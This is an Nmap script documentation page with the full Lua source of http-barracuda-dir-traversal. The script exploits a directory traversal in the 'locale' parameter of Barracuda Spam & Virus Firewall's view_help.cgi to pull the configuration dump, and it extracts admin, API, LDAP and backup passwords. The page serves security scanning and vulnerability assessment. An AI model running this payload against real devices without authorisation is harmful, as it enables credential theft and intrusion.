<html><head><style>body {font-family: verdana;font-size: 0.7em;} tr {font-family: verdana;font-size: 0.7em;}</style></head><body>
<h3>File http-barracuda-dir-traversal</h3>
<b>Script types:</b> portrule<br/>
<b>Categories:</b> auth,auth,auth<br/>
<b>Author:</b> Brendan Coles<br/>
<b>License:</b> <a href="https://nmap.org/book/man-legal.html" target=_blank>https://nmap.org/book/man-legal.html</a><br/>
<b>Download:</b> <a href="https://svn.nmap.org/nmap/scripts/http-barracuda-dir-traversal.nse">https://svn.nmap.org/nmap/scripts/http-barracuda-dir-traversal.nse</a><br/>
<h3>Summary</h3>
<p>Attempts to retrieve the configuration settings from a Barracuda Networks Spam &amp; Virus Firewall device using the directory traversal vulnerability described at http://seclists.org/fulldisclosure/2010/Oct/119.</p>
<p>This vulnerability is in the "locale" parameter of "/cgi-mod/view_help.cgi" or "/cgi-bin/view_help.cgi", allowing the information to be retrieved from a MySQL database dump. The web administration interface runs on port 8000 by default.</p>
<p>Barracuda Networks Spam &amp; Virus Firewall &lt;= 4.1.1.021 Remote Configuration Retrieval Original exploit by ShadowHatesYou <Shadow@SquatThis.net> For more information, see: <a href="http://seclists.org/fulldisclosure/2010/Oct/119 http://www.exploit-db.com/exploits/15130/" target=_blank>http://seclists.org/fulldisclosure/2010/Oct/119 http://www.exploit-db.com/exploits/15130/</a></p>
<h3>Arguments</h3>
<table>
<tr><td>http-max-cache-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>slaxml.debug:</td><td>See the documentation for the <a href="nmap/libraries/slaxml.htm">slaxml</a> library</td></tr>
<tr><td>http.host:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-body-size:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.max-cache-size:</td><td>Set max cache size. The default value is 100,000. Barracuda config files vary in size mostly due to the number of users. Using a max cache size of 5,000,000 bytes should be enough for config files containing up to 5,000 users.</td></tr>
<tr><td>http.max-pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.pipeline:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.truncated-ok:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>http.useragent:</td><td>See the documentation for the <a href="nmap/libraries/http.htm">http</a> library</td></tr>
<tr><td>smbdomain:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbhash:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbnoguest:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbpassword:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbtype:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
<tr><td>smbusername:</td><td>See the documentation for the <a href="nmap/libraries/smbauth.htm">smbauth</a> library</td></tr>
</table>
<h3>Usage</h3>
<pre>nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p &lt;port&gt; &lt;host&gt;</pre>
<h3>Output</h3>
<pre>PORT   STATE SERVICE   REASON
8000/tcp open  http    syn-ack Barracuda Spam firewall http config
| http-barracuda-dir-traversal:
| Users: 256
| Device: Barracuda Spam Firewall
| Version: 4.1.0.0
| Hostname: barracuda
| Domain: example.com
| Timezone: America/Chicago
| Language: en_US
| Password: 123456
| API Password: 123456
| MTA SASL LDAP Password: 123456
| Gateway: 192.168.1.1
| Primary DNS: 192.168.1.2
| Secondary DNS: 192.168.1.3
| DNS Cache: No
| Backup Server: ftp.example.com
| Backup Port: 21
| Backup Type: ftp
| Backup Username: user
| Backup Password: 123456
| NTP Enabled: Yes
| NTP Server: update01.barracudanetworks.com
| SSH Enabled: Yes
| BRTS Enabled: No
| BRTS Server: fp.bl.barracudanetworks.com
| HTTP Port: 8000
| HTTP Disabled: No
| HTTPS Port: 443
| HTTPS Only: No
|
| Vulnerable to directory traversal vulnerability:
|_http://seclists.org/fulldisclosure/2010/Oct/119</pre>
<h3>Requirements</h3>
<ul>
<li><a href="nmap/libraries/http.htm">http</a></li>
<li><a href="nmap/libraries/shortport.htm">shortport</a></li>
<li><a href="nmap/libraries/stdnse.htm">stdnse</a></li>
<li><a href="nmap/libraries/string.htm">string</a></li>
<li><a href="nmap/libraries/table.htm">table</a></li>
</ul>
<h3>Code</h3>
<pre>local http = require &quot;http&quot;
local shortport = require &quot;shortport&quot;
local stdnse = require &quot;stdnse&quot;
local string = require &quot;string&quot;
local table = require &quot;table&quot;

description = [[
Attempts to retrieve the configuration settings from a Barracuda
Networks Spam &amp; Virus Firewall device using the directory traversal
vulnerability described at
http://seclists.org/fulldisclosure/2010/Oct/119.

This vulnerability is in the &quot;locale&quot; parameter of
&quot;/cgi-mod/view_help.cgi&quot; or &quot;/cgi-bin/view_help.cgi&quot;, allowing the
information to be retrieved from a MySQL database dump.  The web
administration interface runs on port 8000 by default.

Barracuda Networks Spam &amp; Virus Firewall &lt;= 4.1.1.021 Remote Configuration Retrieval
Original exploit by ShadowHatesYou &lt;Shadow@SquatThis.net&gt;
For more information, see:
http://seclists.org/fulldisclosure/2010/Oct/119
http://www.exploit-db.com/exploits/15130/
]]

---
-- @usage
-- nmap --script http-barracuda-dir-traversal --script-args http-max-cache-size=5000000 -p &lt;port&gt; &lt;host&gt;
--
-- @args http-max-cache-size
--       Set max cache size. The default value is 100,000.
--       Barracuda config files vary in size mostly due to the number
--       of users. Using a max cache size of 5,000,000 bytes should be
--       enough for config files containing up to 5,000 users.
--
-- @output
-- PORT   STATE SERVICE   REASON
-- 8000/tcp open  http    syn-ack Barracuda Spam firewall http config
-- | http-barracuda-dir-traversal:
-- | Users: 256
-- | Device: Barracuda Spam Firewall
-- | Version: 4.1.0.0
-- | Hostname: barracuda
-- | Domain: example.com
-- | Timezone: America/Chicago
-- | Language: en_US
-- | Password: 123456
-- | API Password: 123456
-- | MTA SASL LDAP Password: 123456
-- | Gateway: 192.168.1.1
-- | Primary DNS: 192.168.1.2
-- | Secondary DNS: 192.168.1.3
-- | DNS Cache: No
-- | Backup Server: ftp.example.com
-- | Backup Port: 21
-- | Backup Type: ftp
-- | Backup Username: user
-- | Backup Password: 123456
-- | NTP Enabled: Yes
-- | NTP Server: update01.barracudanetworks.com
-- | SSH Enabled: Yes
-- | BRTS Enabled: No
-- | BRTS Server: fp.bl.barracudanetworks.com
-- | HTTP Port: 8000
-- | HTTP Disabled: No
-- | HTTPS Port: 443
-- | HTTPS Only: No
-- |
-- | Vulnerable to directory traversal vulnerability:
-- |_http://seclists.org/fulldisclosure/2010/Oct/119
--
-- @changelog
-- 2011-06-08 - created by Brendan Coles - itsecuritysolutions.org
-- 2011-06-10 - added user count
--            - looped path detection
-- 2011-06-15 - looped system info extraction
--            - changed service portrule to &quot;barracuda&quot;
--

author = &quot;Brendan Coles&quot;
license = &quot;Same as Nmap--See https://nmap.org/book/man-legal.html&quot;
categories = {&quot;intrusive&quot;, &quot;exploit&quot;, &quot;auth&quot;}


portrule = shortport.port_or_service (8000, &quot;barracuda&quot;, {&quot;tcp&quot;})

action = function(host, port)

  local result = {}
  local paths = {&quot;/cgi-bin/view_help.cgi&quot;, &quot;/cgi-mod/view_help.cgi&quot;}
  local payload = &quot;?locale=/../../../../../../../mail/snapshot/config.snapshot%00&quot;
  local user_count = 0
  local config_file = &quot;&quot;

  -- Loop through vulnerable files
  stdnse.debug1(&quot;Connecting to %s:%s&quot;, host.targetname or host.ip, port.number)
  for _, path in ipairs(paths) do

    -- Retrieve file
    local data = http.get(host, port, tostring(path))
    if data and data.status then

      -- Check if file exists
      stdnse.debug1(&quot;HTTP %s: %s&quot;, data.status, tostring(path))
      if tostring(data.status):match(&quot;200&quot;) then

        -- Attempt config file retrieval with LFI exploit
        stdnse.debug1(&quot;Exploiting: %s&quot;, tostring(path .. payload))
        data = http.get(host, port, tostring(path .. payload))
        if data and data.status and tostring(data.status):match(&quot;200&quot;) and data.body and data.body ~= &quot;&quot; then

          -- Check if the HTTP response contains a valid config file in MySQL database dump format
          if string.match(data.body, &quot;DROP TABLE IF EXISTS config;&quot;) and string.match(data.body, &quot;barracuda%.css&quot;) then
            config_file = data.body
            break
          end

        else
          stdnse.debug1(&quot;Failed to retrieve file: %s&quot;, tostring(path .. payload))
        end

      end

    else
      stdnse.debug1(&quot;Failed to retrieve file: %s&quot;, tostring(path))
    end

  end

  -- No config file found
  if config_file == &quot;&quot; then
    stdnse.debug1(&quot;%s:%s is not vulnerable or connection timed out.&quot;, host.targetname or host.ip, port.number)
    return
  end

  -- Extract system info from config file in MySQL dump format
  stdnse.debug1(&quot;Exploit success! Extracting system info from MySQL database dump&quot;)

  -- Count users
  if string.match(config_file, &quot;&#39;user_default_email_address&#39;,&quot;) then
    for _ in string.gmatch(config_file, &quot;&#39;user_default_email_address&#39;,&quot;) do user_count = user_count + 1 end
  end
  table.insert(result, string.format(&quot;Users: %s&quot;, user_count))

  -- Extract system info
  local vars = {
    {&quot;Device&quot;, &quot;branding_device_name&quot;},
    {&quot;Version&quot;,&quot;httpd_last_release_notes_version_read&quot;},
    {&quot;Hostname&quot;,&quot;system_default_hostname&quot;},
    {&quot;Domain&quot;,&quot;system_default_domain&quot;},
    {&quot;Timezone&quot;,&quot;system_timezone&quot;},
    {&quot;Language&quot;,&quot;default_ndr_lang&quot;},
    {&quot;Password&quot;,&quot;system_password&quot;},
    {&quot;API Password&quot;,&quot;api_password&quot;},
    {&quot;MTA SASL LDAP Password&quot;,&quot;mta_sasl_ldap_advanced_password&quot;},
    {&quot;Gateway&quot;,&quot;system_gateway&quot;},
    {&quot;Primary DNS&quot;,&quot;system_primary_dns_server&quot;},
    {&quot;Secondary DNS&quot;,&quot;system_secondary_dns_server&quot;},
    {&quot;DNS Cache&quot;,&quot;dns_cache&quot;},
    {&quot;Backup Server&quot;,&quot;backup_server&quot;},
    {&quot;Backup Port&quot;,&quot;backup_port&quot;},
    {&quot;Backup Type&quot;,&quot;backup_type&quot;},
    {&quot;Backup Username&quot;,&quot;backup_username&quot;},
    {&quot;Backup Password&quot;,&quot;backup_password&quot;},
    {&quot;NTP Enabled&quot;,&quot;system_ntp&quot;},
    {&quot;NTP Server&quot;,&quot;system_ntp_server&quot;},
    {&quot;SSH Enabled&quot;,&quot;system_ssh_enable&quot;},
    {&quot;BRTS Enabled&quot;,&quot;brts_enable&quot;},
    {&quot;BRTS Server&quot;,&quot;brts_lookup_domain&quot;},
    {&quot;HTTP Port&quot;,&quot;http_port&quot;},
    {&quot;HTTP Disabled&quot;,&quot;http_shutoff&quot;},
    {&quot;HTTPS Port&quot;,&quot;https_port&quot;},
    {&quot;HTTPS Only&quot;,&quot;https_only&quot;},
  }
  for _, var in ipairs(vars) do
    local var_match = string.match(config_file, string.format(&quot;&#39;%s&#39;,&#39;([^&#39;]+)&#39;,&#39;global&#39;,&quot;, var[2]))
    if var_match then table.insert(result, string.format(&quot;%s: %s&quot;, var[1], var_match)) end
  end

  table.insert(result, &quot;\nVulnerable to directory traversal vulnerability:\nhttp://seclists.org/fulldisclosure/2010/Oct/119&quot;)

  -- Return results
  return stdnse.format_output(true, result)

end</pre>
